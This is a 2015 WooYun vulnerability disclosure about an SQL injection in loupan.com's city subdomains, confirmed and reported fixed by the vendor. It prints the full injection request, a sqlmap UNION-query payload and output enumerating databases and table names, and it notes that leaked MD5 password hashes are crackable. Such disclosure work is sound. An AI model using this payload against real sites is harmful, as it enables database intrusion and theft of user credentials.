当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141649

漏洞标题:楼盘网分站存在SQL漏洞

相关厂商:loupan.com

漏洞作者: 霝z

提交时间:2015-09-16 20:53

修复时间:2015-11-02 14:06

公开时间:2015-11-02 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

涉及4个数据库、大量账户密码。

详细说明:

1、注入点
2、涉及数据库
3、泄露账户、密码
1、POST注入点(gz\cq\sh..基本二级域名都有):

POST /index.php/house/ajax_top_search_data/?s=0.704752029851079 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: */*
Origin: http://cq.loupan.com
Referer: http://cq.loupan.com/
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: cq.loupan.com
Cookie: nom=0; PHPSESSID=jhfoehk3f2j3s62lhkuugreor6; loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227110e0ec90c5ffa5d808db252953f7c7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2214.23.175.62%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+Netsparker%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1442229262%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A59554%3B%7D94fd5d129a521eea870d85fa4d96d619; loadDomain=http%3A%2F%2Fcq.loupan.com%2F; search_keyword_site_id=296
Accept-Encoding: gzip, deflate
Content-Length: 18
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
kw=-1+OR+17-7%3d10


2、涉及的数据库:

Place: POST
Parameter: kw
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: kw=-1 OR 17-7=10' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7868693a,0x744962577243676a784d,0x3a7263723a), NULL#
---
[13:56:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
[13:56:42] [INFO] fetching database names
available databases [4]:
[*] haiwai
[*] information_schema
[*] loupan2013
[*] wenda


节选的部分tables:

Database: loupan2013
[132 tables]
+------------------------------------+
| coreseek_counter                   |
| lp_admin                           |
| lp_admin_log                       |
| lp_admin_permissions               |
| lp_admin_roles                     |
| lp_admin_roles_permissions         |
| lp_admin_sites                     |
| lp_ads                             |
| lp_ads_pages                       |
| lp_ads_positions                   |
| lp_ads_sites                       |
| lp_attachments                     |
| lp_broker                          |
| lp_changelog                       |
| lp_ci_sessions                     |
| lp_cities                          |
| lp_cities_price                    |
| lp_consultant                      |
| lp_contact_info                    |
| lp_customer_purchase_intention     |
| lp_dissertation                    |
| lp_dissertation_model              |
| lp_email_bind                      |
| lp_email_get_password              |
| lp_email_validate                  |
| lp_fangdai_bbs                     |
| lp_feedback                        |
| lp_fenxiao_balance                 |
| lp_fenxiao_balance_application     |
| lp_fenxiao_balance_history         |
| lp_fenxiao_clients                 |
| lp_fenxiao_clients_disengagement   |
| lp_fenxiao_history                 |
| lp_fenxiao_new_broker              |
| lp_fenxiao_referrals               |
| lp_fenxiao_referrals_history       |
| lp_fenxiao_site_msg                |
| lp_fenxiao_user_collect            |
| lp_fenxiao_view                    |
| lp_fenxiao_xieyi                   |
| lp_forum                           |
| lp_friend_categories               |
| lp_friend_link_application         |
| lp_friend_link_investigation_cycle |
| lp_friend_link_investigation_error |
| lp_friend_links                    |
| lp_frontend_pages                  |
| lp_frontend_pages_extra            |
| lp_group_buy                       |
| lp_group_buy_forms                 |
| lp_hlink_in_news                   |
| lp_house_correction                |
| lp_houses                          |
| lp_houses_attributes               |
| lp_houses_click_cache              |
| lp_houses_comment                  |
| lp_houses_editor_comment           |
| lp_houses_fenxiao                  |
| lp_houses_info                     |
| lp_houses_parameters               |
| lp_houses_pic_draw                 |
| lp_houses_pic_effect               |
| lp_houses_pic_focus                |
| lp_houses_pic_mating               |
| lp_houses_pic_model                |
| lp_houses_pic_real                 |
| lp_houses_pic_traffic              |
| lp_houses_price_history            |
| lp_houses_prices                   |
| lp_houses_score                    |
| lp_houses_special                  |
| lp_houses_telephone_set            |
| lp_houses_thumb_cache              |
| lp_houses_trend                    |
| lp_hpyold2new                      |
| lp_information_gathering           |
| lp_loan                            |
| lp_lottery                         |
| lp_lottery_type                    |
| lp_loupandai_msg                   |
| lp_loupandai_token                 |
| lp_merchants                       |
| lp_message                         |
| lp_news                            |
| lp_news_backup                     |
| lp_news_categories                 |
| lp_news_info                       |
| lp_news_keywords                   |
| lp_news_position                   |
| lp_news_position_relation          |
| lp_notice                          |
| lp_notice_new                      |
| lp_notice_new_record               |
| lp_sites                           |
| lp_sms                             |
| lp_sms_queue                       |
| lp_special_keywords                |
| lp_special_keywords_comments       |
| lp_special_keywords_old            |
| lp_special_keywords_old_related    |
| lp_store                           |
| lp_syn_phone_config                |
| lp_telephone_balance               |
| lp_telephone_cost                  |
| lp_telephone_cost_bak              |
| lp_telephone_cost_bak201569        |
| lp_telephone_history               |
| lp_telephone_queue                 |
| lp_telephone_recharge_history      |
| lp_telephone_set_pool              |
| lp_toupiao                         |
| lp_user_atuo_refresh_templet       |
| lp_user_balance                    |
| lp_user_balance_history            |
| lp_user_collect                    |
| lp_user_combo                      |
| lp_user_operation_auto_refresh     |
| lp_user_operation_promotion        |
| lp_user_operation_refresh          |
| lp_user_operation_top              |
| lp_users                           |
| lp_users_accepter                  |
| lp_users_link_accepter             |
| lp_users_link_provider             |
| lp_users_provider                  |
| lp_weixin                          |
| lp_weixin_member                   |
| lp_weixin_member_pio               |
| lp_weixin_message                  |
| lp_xfbiaoqian                      |
| lp_youhui_class                    |
| lp_youhui_list                     |
+------------------------------------+


3、泄露的账户密码:

loupan.jpg


还好,不是明文,不过在md5上面可以查到对应密码,最好还是进行提醒修改吧。

漏洞证明:

loupan.jpg

修复方案:

过滤参数

版权声明:转载请注明来源 霝z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-18 14:05

厂商回复:

已经修复,感谢您的关注,另外希望泄漏数据的图片码打厚实些。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-22 19:37 | 霝z ( 实习白帽子 | Rank:83 漏洞数:38 | 乌~~有进步才是最重要的事!)

    感谢提醒,后续注意.